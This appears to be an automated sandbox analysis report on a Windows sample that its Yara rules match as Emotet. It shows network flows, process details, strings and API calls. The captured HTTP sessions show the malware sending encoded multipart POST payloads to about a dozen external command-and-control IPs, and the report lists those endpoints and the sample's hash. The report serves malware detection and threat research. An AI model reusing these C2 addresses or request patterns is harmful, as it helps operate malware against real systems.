Aug 20, 2024 17:47:06.265662909 CEST	8080	49719	120.138.30.150	192.168.2.9
Aug 20, 2024 17:47:06.265681028 CEST	8080	49719	120.138.30.150	192.168.2.9
Aug 20, 2024 17:47:06.265691042 CEST	8080	49719	120.138.30.150	192.168.2.9
Aug 20, 2024 17:47:06.265701056 CEST	8080	49719	120.138.30.150	192.168.2.9
Aug 20, 2024 17:47:08.911274910 CEST	49720	443	192.168.2.9	194.187.133.160
Aug 20, 2024 17:47:08.911323071 CEST	443	49720	194.187.133.160	192.168.2.9
Aug 20, 2024 17:47:08.911428928 CEST	49720	443	192.168.2.9	194.187.133.160
Aug 20, 2024 17:47:08.911530018 CEST	49720	443	192.168.2.9	194.187.133.160
Aug 20, 2024 17:47:08.911540031 CEST	443	49720	194.187.133.160	192.168.2.9
Aug 20, 2024 17:47:08.911570072 CEST	49720	443	192.168.2.9	194.187.133.160
Aug 20, 2024 17:47:08.911576033 CEST	443	49720	194.187.133.160	192.168.2.9
Aug 20, 2024 17:47:08.911597013 CEST	443	49720	194.187.133.160	192.168.2.9
Aug 20, 2024 17:47:11.985057116 CEST	49721	8080	192.168.2.9	104.236.246.93
Aug 20, 2024 17:47:11.990278959 CEST	8080	49721	104.236.246.93	192.168.2.9
Aug 20, 2024 17:47:11.990400076 CEST	49721	8080	192.168.2.9	104.236.246.93
Aug 20, 2024 17:47:11.990511894 CEST	49721	8080	192.168.2.9	104.236.246.93
Aug 20, 2024 17:47:11.990547895 CEST	49721	8080	192.168.2.9	104.236.246.93
Aug 20, 2024 17:47:11.995920897 CEST	8080	49721	104.236.246.93	192.168.2.9
Aug 20, 2024 17:47:11.996001959 CEST	8080	49721	104.236.246.93	192.168.2.9
Aug 20, 2024 17:47:11.996057987 CEST	8080	49721	104.236.246.93	192.168.2.9
Aug 20, 2024 17:47:11.996073008 CEST	8080	49721	104.236.246.93	192.168.2.9
Aug 20, 2024 17:47:11.996257067 CEST	8080	49721	104.236.246.93	192.168.2.9
Aug 20, 2024 17:47:11.996265888 CEST	8080	49721	104.236.246.93	192.168.2.9
Aug 20, 2024 17:47:14.346996069 CEST	49722	8080	192.168.2.9	74.208.45.104
Aug 20, 2024 17:47:14.352134943 CEST	8080	49722	74.208.45.104	192.168.2.9
Aug 20, 2024 17:47:14.352226973 CEST	49722	8080	192.168.2.9	74.208.45.104
Aug 20, 2024 17:47:14.352354050 CEST	49722	8080	192.168.2.9	74.208.45.104
Aug 20, 2024 17:47:14.352407932 CEST	49722	8080	192.168.2.9	74.208.45.104
Aug 20, 2024 17:47:14.358335972 CEST	8080	49722	74.208.45.104	192.168.2.9
Aug 20, 2024 17:47:14.358397007 CEST	8080	49722	74.208.45.104	192.168.2.9
Aug 20, 2024 17:47:14.358406067 CEST	8080	49722	74.208.45.104	192.168.2.9
Aug 20, 2024 17:47:14.358547926 CEST	8080	49722	74.208.45.104	192.168.2.9
Aug 20, 2024 17:47:14.359126091 CEST	8080	49722	74.208.45.104	192.168.2.9
Aug 20, 2024 17:47:14.359137058 CEST	8080	49722	74.208.45.104	192.168.2.9
Aug 20, 2024 17:47:16.926866055 CEST	49723	80	192.168.2.9	78.187.156.31
Aug 20, 2024 17:47:16.932348967 CEST	80	49723	78.187.156.31	192.168.2.9
Aug 20, 2024 17:47:16.932471991 CEST	49723	80	192.168.2.9	78.187.156.31
Aug 20, 2024 17:47:16.932698965 CEST	49723	80	192.168.2.9	78.187.156.31
Aug 20, 2024 17:47:16.932770014 CEST	49723	80	192.168.2.9	78.187.156.31
Aug 20, 2024 17:47:16.937611103 CEST	80	49723	78.187.156.31	192.168.2.9
Aug 20, 2024 17:47:16.937710047 CEST	80	49723	78.187.156.31	192.168.2.9
Aug 20, 2024 17:47:16.937719107 CEST	80	49723	78.187.156.31	192.168.2.9
Aug 20, 2024 17:47:16.937757969 CEST	80	49723	78.187.156.31	192.168.2.9
Aug 20, 2024 17:47:16.938055992 CEST	80	49723	78.187.156.31	192.168.2.9
Aug 20, 2024 17:47:38.403652906 CEST	80	49723	78.187.156.31	192.168.2.9
Aug 20, 2024 17:47:38.403788090 CEST	49723	80	192.168.2.9	78.187.156.31
Aug 20, 2024 17:47:38.405569077 CEST	49723	80	192.168.2.9	78.187.156.31
Aug 20, 2024 17:47:38.410371065 CEST	80	49723	78.187.156.31	192.168.2.9
Aug 20, 2024 17:47:40.984658003 CEST	49732	80	192.168.2.9	187.161.206.24
Aug 20, 2024 17:47:40.990717888 CEST	80	49732	187.161.206.24	192.168.2.9
Aug 20, 2024 17:47:40.990848064 CEST	49732	80	192.168.2.9	187.161.206.24
Aug 20, 2024 17:47:40.991069078 CEST	49732	80	192.168.2.9	187.161.206.24
Aug 20, 2024 17:47:40.991126060 CEST	49732	80	192.168.2.9	187.161.206.24
Aug 20, 2024 17:47:40.996058941 CEST	80	49732	187.161.206.24	192.168.2.9
Aug 20, 2024 17:47:40.996068954 CEST	80	49732	187.161.206.24	192.168.2.9
Aug 20, 2024 17:47:40.996076107 CEST	80	49732	187.161.206.24	192.168.2.9
Aug 20, 2024 17:47:40.996083975 CEST	80	49732	187.161.206.24	192.168.2.9
Aug 20, 2024 17:47:40.997823954 CEST	80	49732	187.161.206.24	192.168.2.9
Aug 20, 2024 17:48:02.355740070 CEST	80	49732	187.161.206.24	192.168.2.9
Aug 20, 2024 17:48:02.355839968 CEST	49732	80	192.168.2.9	187.161.206.24
Aug 20, 2024 17:48:02.355947018 CEST	49732	80	192.168.2.9	187.161.206.24
Aug 20, 2024 17:48:02.360872030 CEST	80	49732	187.161.206.24	192.168.2.9
Aug 20, 2024 17:48:05.000611067 CEST	49737	80	192.168.2.9	94.23.216.33
Aug 20, 2024 17:48:05.113224983 CEST	80	49737	94.23.216.33	192.168.2.9
Aug 20, 2024 17:48:05.113441944 CEST	49737	80	192.168.2.9	94.23.216.33
Aug 20, 2024 17:48:05.113935947 CEST	49737	80	192.168.2.9	94.23.216.33
Aug 20, 2024 17:48:05.114068985 CEST	49737	80	192.168.2.9	94.23.216.33
Aug 20, 2024 17:48:05.118889093 CEST	80	49737	94.23.216.33	192.168.2.9
Aug 20, 2024 17:48:05.119086027 CEST	80	49737	94.23.216.33	192.168.2.9
Aug 20, 2024 17:48:05.119096041 CEST	80	49737	94.23.216.33	192.168.2.9
Aug 20, 2024 17:48:05.119257927 CEST	80	49737	94.23.216.33	192.168.2.9
Aug 20, 2024 17:48:05.119268894 CEST	80	49737	94.23.216.33	192.168.2.9
Aug 20, 2024 17:48:06.769037962 CEST	80	49737	94.23.216.33	192.168.2.9
Aug 20, 2024 17:48:06.769237041 CEST	49737	80	192.168.2.9	94.23.216.33
Aug 20, 2024 17:48:06.769273043 CEST	49737	80	192.168.2.9	94.23.216.33
Aug 20, 2024 17:48:06.774362087 CEST	80	49737	94.23.216.33	192.168.2.9
Aug 20, 2024 17:48:09.768138885 CEST	49738	80	192.168.2.9	172.91.208.86
Aug 20, 2024 17:48:09.773101091 CEST	80	49738	172.91.208.86	192.168.2.9
Aug 20, 2024 17:48:09.773226976 CEST	49738	80	192.168.2.9	172.91.208.86
Aug 20, 2024 17:48:09.773411989 CEST	49738	80	192.168.2.9	172.91.208.86
Aug 20, 2024 17:48:09.773462057 CEST	49738	80	192.168.2.9	172.91.208.86
Aug 20, 2024 17:48:09.778318882 CEST	80	49738	172.91.208.86	192.168.2.9
Aug 20, 2024 17:48:09.778398991 CEST	80	49738	172.91.208.86	192.168.2.9
Aug 20, 2024 17:48:09.778409958 CEST	80	49738	172.91.208.86	192.168.2.9
Aug 20, 2024 17:48:09.778439045 CEST	80	49738	172.91.208.86	192.168.2.9
Aug 20, 2024 17:48:09.778623104 CEST	80	49738	172.91.208.86	192.168.2.9
Aug 20, 2024 17:48:31.137193918 CEST	80	49738	172.91.208.86	192.168.2.9
Aug 20, 2024 17:48:31.137315989 CEST	49738	80	192.168.2.9	172.91.208.86
Aug 20, 2024 17:48:31.137444973 CEST	49738	80	192.168.2.9	172.91.208.86
Aug 20, 2024 17:48:31.142338037 CEST	80	49738	172.91.208.86	192.168.2.9
Aug 20, 2024 17:48:34.534238100 CEST	49739	7080	192.168.2.9	91.211.88.52
Aug 20, 2024 17:48:34.583600044 CEST	7080	49739	91.211.88.52	192.168.2.9
Aug 20, 2024 17:48:34.583679914 CEST	49739	7080	192.168.2.9	91.211.88.52
Aug 20, 2024 17:48:34.584220886 CEST	49739	7080	192.168.2.9	91.211.88.52
Aug 20, 2024 17:48:34.584289074 CEST	49739	7080	192.168.2.9	91.211.88.52
Aug 20, 2024 17:48:34.589142084 CEST	7080	49739	91.211.88.52	192.168.2.9
Aug 20, 2024 17:48:34.589178085 CEST	7080	49739	91.211.88.52	192.168.2.9
Aug 20, 2024 17:48:34.589195013 CEST	7080	49739	91.211.88.52	192.168.2.9
Aug 20, 2024 17:48:34.589205027 CEST	7080	49739	91.211.88.52	192.168.2.9
Aug 20, 2024 17:48:34.589253902 CEST	7080	49739	91.211.88.52	192.168.2.9

HTTP Request Dependency Graph

74.219.172.26

134.209.36.254

134.209.36.254:8080

104.156.59.7

104.156.59.7:8080

120.138.30.150

120.138.30.150:8080

194.187.133.160

194.187.133.160:443

104.236.246.93

104.236.246.93:8080

74.208.45.104

74.208.45.104:8080

78.187.156.31

187.161.206.24

94.23.216.33

172.91.208.86

91.211.88.52

91.211.88.52:7080

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49707	74.219.172.26	80	6952	C:\Windows\SysWOW64\dllhost\provthrd.exe

Timestamp	Bytes transferred	Direction	Data
Aug 20, 2024 17:46:55.466995001 CEST	556	OUT	POST /8hLlZRoSuj4D/ksMu/9fBWMlkr3EKOS/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 74.219.172.26/8hLlZRoSuj4D/ksMu/9fBWMlkr3EKOS/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----------------nSkemeWNWaOePnS4 Host: 74.219.172.26 Content-Length: 4644 Cache-Control: no-cache
Aug 20, 2024 17:46:55.467019081 CEST	4644	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6e 53 6b 65 6d 65 57 4e 57 61 4f 65 50 6e 53 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 71 78 66 79 64 Data Ascii: ------------------nSkemeWNWaOePnS4Content-Disposition: form-data; name="hqxfyd"; filename="tjrficg"Content-Type: application/octet-stream/iLx3Hf/U8}3y[&@/"aX[?D(0Iq`zg5w"1$]ejJ[o$57

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49717	134.209.36.254	8080	6952	C:\Windows\SysWOW64\dllhost\provthrd.exe

Timestamp	Bytes transferred	Direction	Data
Aug 20, 2024 17:46:59.259617090 CEST	493	OUT	POST /E3hL/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 134.209.36.254/E3hL/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=--------OOSFyEas Host: 134.209.36.254:8080 Content-Length: 4644 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49718	104.156.59.7	8080	6952	C:\Windows\SysWOW64\dllhost\provthrd.exe

Timestamp	Bytes transferred	Direction	Data
Aug 20, 2024 17:47:02.946075916 CEST	609	OUT	POST /FLhkn5FxBNj/8yJJGMkkOjbevD3VkJc/chiAEdV6SWHfxYU9F5L/ueCJ8/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 104.156.59.7/FLhkn5FxBNj/8yJJGMkkOjbevD3VkJc/chiAEdV6SWHfxYU9F5L/ueCJ8/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------MSEffD6JzUJfZBt Host: 104.156.59.7:8080 Content-Length: 4644 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49719	120.138.30.150	8080	6952	C:\Windows\SysWOW64\dllhost\provthrd.exe

Timestamp	Bytes transferred	Direction	Data
Aug 20, 2024 17:47:06.260601997 CEST	609	OUT	POST /lU14Zt2m53k/H2EhTjamVycE7Ms/WrUPXLEjwgv/PuiLN1ozgyS2ZRE/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 120.138.30.150/lU14Zt2m53k/H2EhTjamVycE7Ms/WrUPXLEjwgv/PuiLN1ozgyS2ZRE/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------bZkOzxK4zn4b0KT Host: 120.138.30.150:8080 Content-Length: 4644 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49720	194.187.133.160	443	6952	C:\Windows\SysWOW64\dllhost\provthrd.exe

Timestamp	Bytes transferred	Direction	Data
Aug 20, 2024 17:47:08.911530018 CEST	538	OUT	POST /XG8n3jTZrFy/lHI9yRZ/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 194.187.133.160/XG8n3jTZrFy/lHI9yRZ/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------zXleQFeYywUClB9 Host: 194.187.133.160:443 Content-Length: 4644 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49721	104.236.246.93	8080	6952	C:\Windows\SysWOW64\dllhost\provthrd.exe

Timestamp	Bytes transferred	Direction	Data
Aug 20, 2024 17:47:11.990511894 CEST	585	OUT	POST /k8c81KX7QFFfrFTdR/7RU5TsLAyuI8jjWiQtR/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 104.236.246.93/k8c81KX7QFFfrFTdR/7RU5TsLAyuI8jjWiQtR/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------------NBBLq11r7nGYVqjmxbNHU Host: 104.236.246.93:8080 Content-Length: 4644 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49722	74.208.45.104	8080	6952	C:\Windows\SysWOW64\dllhost\provthrd.exe

Timestamp	Bytes transferred	Direction	Data
Aug 20, 2024 17:47:14.352354050 CEST	575	OUT	POST /ejCfJvV1/kxVOd5S1eQMg5w/THuO0hNhX41BMsZAJU/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 74.208.45.104/ejCfJvV1/kxVOd5S1eQMg5w/THuO0hNhX41BMsZAJU/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=------------Do3Ke7g8xifp Host: 74.208.45.104:8080 Content-Length: 4644 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49723	78.187.156.31	80	6952	C:\Windows\SysWOW64\dllhost\provthrd.exe

Timestamp	Bytes transferred	Direction	Data
Aug 20, 2024 17:47:16.932698965 CEST	510	OUT	POST /5S5kEp7rlV/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 78.187.156.31/5S5kEp7rlV/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=--------------lCyDxrkplc0as1 Host: 78.187.156.31 Content-Length: 4644 Cache-Control: no-cache
Aug 20, 2024 17:47:16.932770014 CEST	4644	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6c 43 79 44 78 72 6b 70 6c 63 30 61 73 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 6a 6c 6c 78 22 3b 20 66 69 Data Ascii: ----------------lCyDxrkplc0as1Content-Disposition: form-data; name="bjllx"; filename="ovjaxyyxrhrmu"Content-Type: application/octet-stream`J\m1W^w!: 104dM*IRi2#W!,_$B=siP[rs%&-H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49732	187.161.206.24	80	6952	C:\Windows\SysWOW64\dllhost\provthrd.exe

Timestamp	Bytes transferred	Direction	Data
Aug 20, 2024 17:47:40.991069078 CEST	540	OUT	POST /ImKmz54ud/lOnNJXoawXKn45K/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 187.161.206.24/ImKmz54ud/lOnNJXoawXKn45K/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=-------------1vnYjInPs0nRO Host: 187.161.206.24 Content-Length: 4596 Cache-Control: no-cache
Aug 20, 2024 17:47:40.991126060 CEST	4596	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 76 6e 59 6a 49 6e 50 73 30 6e 52 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 71 69 6f 71 79 71 6f 61 77 6a 22 3b Data Ascii: ---------------1vnYjInPs0nROContent-Disposition: form-data; name="qioqyqoawj"; filename="rohuhfstjgqlbujm"Content-Type: application/octet-streamN&:/clAc/4Jx`-=6YQ_wyIc;A@9\|lC12

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49737	94.23.216.33	80	6952	C:\Windows\SysWOW64\dllhost\provthrd.exe

Timestamp	Bytes transferred	Direction	Data
Aug 20, 2024 17:48:05.113935947 CEST	522	OUT	POST /7hdPY7r49/4nVUijhIy/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 94.23.216.33/7hdPY7r49/4nVUijhIy/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=------------WBkExGP7QZeT Host: 94.23.216.33 Content-Length: 4596 Cache-Control: no-cache
Aug 20, 2024 17:48:05.114068985 CEST	4596	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 57 42 6b 45 78 47 50 37 51 5a 65 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6a 75 73 68 75 64 78 64 6a 62 6b 22 3b 20 Data Ascii: --------------WBkExGP7QZeTContent-Disposition: form-data; name="jushudxdjbk"; filename="wpnzjkvpugrj"Content-Type: application/octet-streamt Jab(8RY6F\{^rp[g={ie.X%^b/=\|M^Ej~"vi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.9	49738	172.91.208.86	80	6952	C:\Windows\SysWOW64\dllhost\provthrd.exe

Timestamp	Bytes transferred	Direction	Data
Aug 20, 2024 17:48:09.773411989 CEST	494	OUT	POST /m19rVa/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 172.91.208.86/m19rVa/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----------R15P0sdM7t Host: 172.91.208.86 Content-Length: 4596 Cache-Control: no-cache
Aug 20, 2024 17:48:09.773462057 CEST	4596	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 52 31 35 50 30 73 64 4d 37 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 62 6f 77 78 6a 76 74 75 74 6b 74 69 67 75 66 22 3b Data Ascii: ------------R15P0sdM7tContent-Disposition: form-data; name="lbowxjvtutktiguf"; filename="rvntoletaztdsvtci"Content-Type: application/octet-stream/Cv2$EGhKqN7nq6KSR\[eQ#[+v7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.9	49739	91.211.88.52	7080	6952	C:\Windows\SysWOW64\dllhost\provthrd.exe

Timestamp	Bytes transferred	Direction	Data
Aug 20, 2024 17:48:34.584220886 CEST	607	OUT	POST /qPRhI3AY6tivsBoVsOK/Kx7UvWvCn/s0eQH/CKvPQGj4EAYI/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 91.211.88.52/qPRhI3AY6tivsBoVsOK/Kx7UvWvCn/s0eQH/CKvPQGj4EAYI/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=-----------------------TgOn9JqIY7Z0lZ2GBbROfBV Host: 91.211.88.52:7080 Content-Length: 4612 Cache-Control: no-cache

Target ID:	0
Start time:	11:46:39
Start date:	20/08/2024
Path:	C:\Users\user\Desktop\ExeFile (360).exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ExeFile (360).exe"
Imagebase:	0x400000
File size:	536'576 bytes
MD5 hash:	8E2BDD409A89CBB6B5EB424E9D1BDA34
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.1492453418.0000000002504000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000000.00000002.1492453418.0000000002504000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.1491620333.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000000.00000002.1491620333.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:46:40
Start date:	20/08/2024
Path:	C:\Windows\SysWOW64\dllhost\provthrd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\dllhost\provthrd.exe"
Imagebase:	0x400000
File size:	536'576 bytes
MD5 hash:	8E2BDD409A89CBB6B5EB424E9D1BDA34
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.2728136517.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000002.00000002.2728136517.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.2728254557.00000000008E4000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000002.00000002.2728254557.00000000008E4000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	2%
Dynamic/Decrypted Code Coverage:	39.1%
Signature Coverage:	27.7%
Total number of Nodes:	806
Total number of Limit Nodes:	34

Executed Functions

Function 004036D0 Relevance: 39.2, APIs: 6, Strings: 16, Instructions: 664
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNEL32 ref: 004037E6

Part of subcall function 00403690: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000), ref: 004036A6

VirtualAlloc.KERNELBASE(00000000,?,00000000,00000000), ref: 004039B5
LoadIconA.USER32(?,000000C6), ref: 00403A83
CoInitialize.OLE32(00000000), ref: 00403AC5

Strings

76567567$%^#$@%$GFSDZDAHxsf, xrefs: 00403766, 0040378F
Dial-up watch, xrefs: 00403A98
+pCZ_@Yjqp0E^j<ns$gq!FR%9+pHDhKd(^xHhwDFa4NpFHL#5ah6^fLsO, xrefs: 004039CF
\Dial-up watch.lnk, xrefs: 00403E5B
.mdb, xrefs: 00403C70
Virtua, xrefs: 004037EC, 00403815
Josefsson, xrefs: 00403ACB
SDASQFddefgshdSSSgfdtEghfIITFDSSSSS, xrefs: 0040395C
8192, xrefs: 0040399D
lAlloc, xrefs: 00403830, 00403859
EDAWytyfghtyuGFASCZFSDSGSDGDSZC, xrefs: 00403704, 0040372D
kernel32.dll, xrefs: 004038DF
Connections, xrefs: 00403C36
Keeps an eye on the dial-up connections, xrefs: 00403DDA
l_E, xrefs: 004038F8
.dll, xrefs: 00403C5A

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: AcquireAllocConsoleContextCryptFreeIconInitializeLoadVirtual
